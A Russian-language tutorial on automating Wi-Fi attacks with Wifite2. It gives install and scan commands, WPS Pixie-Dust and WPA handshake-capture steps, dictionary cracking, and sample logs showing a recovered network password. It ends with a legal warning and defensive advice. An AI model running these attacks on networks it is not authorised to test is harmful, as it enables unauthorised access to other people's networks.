Руководство по использованию Wifite2 для взлома Wi-Fi сетей

Руководство по использованию Wifite2 для взлома Wi-Fi сетей

В этой статье будет рассмотрена утилита Wifite2 для автоматизации атак на Wi-Fi.

image

В этой статье рассмотрена утилита Wifite2 для автоматизации атак на Wi-Fi сети. Узнайте, как выбрать наилучшую стратегию взлома каждой сети.

Wifite2 и Wifite: Краткий Обзор

Wifite был одним из первых инструментов для автоматизированного взлома Wi-Fi. В сравнении с Besside-ng, Wifite предлагает больше сценариев атак, что делает его более гибким, но иногда и медлительным.

Wifite2 - это обновленная версия, которая работает быстрее и эффективнее. Она стала мощнее и предлагает более изощренные тактики взлома.

Сценарий Атаки на Wi-Fi с Использованием Wifite2

Wifite2 реализует эффективный алгоритм для быстрого взлома близлежащих сетей. Программа сначала сканирует все каналы и сортирует сети по силе сигнала.

После сортировки Wifite2 отображает информацию о подключенных клиентах, наличии WPS и типе шифрования. На основе этой информации можно выбрать цели для атаки.

Подготовка и Пошаговая Реализация Атаки

Шаг 1: Установка Wifite2

Для начала потребуется сетевой Wi-Fi адаптер с поддержкой режима мониторинга. Wifite2 установлен в Kali Linux по умолчанию. Если вы не знакомы с Kali Linux, рекомендуем ознакомиться с вводным руководством по Kali Linux.

Если Wifite2 не установлен в вашей системе, выполните следующие команды в терминале:

git clone https://github.com/derv82/wifite2.git
cd wifite2
sudo python setup.py install
        

Теперь Wifite2 установлен в вашей системе. Введите команду wifite -h для получения информации о текущей версии.

Шаг 2: Подключение Wi-Fi карты

Подключите беспроводной сетевой адаптер, совместимый с Kali Linux. Wifite2 автоматически выбирает адаптер и переключает карту в режим мониторинга. Совет: Убедитесь, что ваш адаптер поддерживает режим мониторинга, иначе атаки могут не сработать.

Шаг 3: Настройка Параметров и Поиск Целей

Если вы знаете канал атаки, используйте параметр -c для его указания. Например:

wifite -c 11
        

После сканирования получите список доступных целей.

Шаг 4: Исследование Окружающей Территории и Выбор Целей

Изучите список целей и выберите наиболее подходящие для атаки. Можно также использовать флаг -wps для поиска сетей с уязвимым WPS.

wifite -wps
        

Шаг 5: Автоматические Атаки на Однотипные Цели

После выбора целей Wifite2 начнет автоматические атаки. Если первый сценарий не сработает, программа попробует другой метод.

[+] (1/1) starting attacks against 69:96:43:69:D6:96 (The Daily Planet)
[+] The Daily Planet (76db) WPS Pixie-Dust: [--78s] Failed: Timeout after 300 seconds
[+] The Daily Planet (52db) WPA Handshake capture: Discovered new client: C8:E0:EB:45:CD:45
[+] The Daily Planet (35db) WPA Handshake capture: Listening. (clients:1, deauth:11s, timeout:7m59s)
[+] successfully captured handshake
[+] saving copy of handshake to hs/handshake_TheDailyPlanet_69:96:43:69:D6:96_2018-12-24T00-33-18.cap saved
[+] analysis of captured handshake file:
[+] tshark: .cap file contains a valid handshake for 69:96:43:69:D6:96
[!] pyrit: .cap file does not contain a valid handshake
[+] cowpatty: .cap file contains a valid handshake for (The Daily Planet)
[+] aircrack: .cap file contains a valid handshake for 69:96:43:69:D6:96
[+] Cracking WPA Handshake: Using aircrack-ng via common.txt wordlist
[!] Failed to crack handshake: common.txt did not contain password
[+] Finished attacking 1 target(s), exiting
        

Шаг 6: Сохранение и Анализ Результатов

Результаты атаки можно сохранить для дальнейшего анализа. Если атака увязла, можно использовать сочетание клавиш Ctrl-C для остановки.

[+] SBG6580E8 (47db) WPS Pixie-Dust: [4m52s] Trying PIN 12523146 (DeAuth:Timeout) (Timeouts:15)
[!] interrupted
[+] 1 attack(s) remain, do you want to continue?
[+] type c to continue or s to stop:
        

Если мы смогли получить 4-этапное рукопожатие, то можно перебрать пароли с помощью флага --dict и пути к словарю.

wifite -wpa --dict ./passwords.txt
        

Пример успешной дешифровки:

[+] Cracked WPA Handshake PSK: christmasham
[+] Access Point Name: Bourgeois Pig Guest
[+] Access Point BSSID: DE:F2:86:EC:CA:A0
[+] Encryption: WPA
[+] Handshake File: hs/handshake_BourgeoisPigGuest_DE-F2-86-EC-CA-A0_2018-12-24T01-40-28.cap
[+] PSK (password): christmasham
[+] saved crack result to cracked.txt (1 total)
[+] Finished attacking 1 target(s), exiting
        

Предупреждение об ответственности и методы защиты


Wifite2 – очень хороший пример, когда даже новичок может реализовать эффективную атаку на сети, обладающие наиболее распространенными уязвимостями, как, например, пин в WPS или слабые пароли. С увеличением уровня автоматизации более продвинутых атак, важно быть в тренде и знать наиболее эффективные методы взлома Wi-Fi сетей. В целом, наилучший способ защитить сеть от утилит наподобие Wifite2 – отключить WPS и использовать сильный пароль, который знает ограниченный круг лиц.

Важно отметить, что, если выбрать все цели, Wifite2 будет осуществлять атаки на все сети, а не только на которые у вас есть разрешение «тестировать». Если у вас нет разрешения на реализацию атаки, то, по сути, вы становитесь на путь криминала и можете попасть в серьезные неприятности. Отговорки навроде «атаку осуществил скрипт» не прокатят. Особенно если речь идет о каких-то серьезных и важных сетях.

Ученые доказали: чтение нашего канала продлевает жизнь!

Ладно, не доказали. Но мы работаем над этим

Поучаствуйте в эксперименте — подпишитесь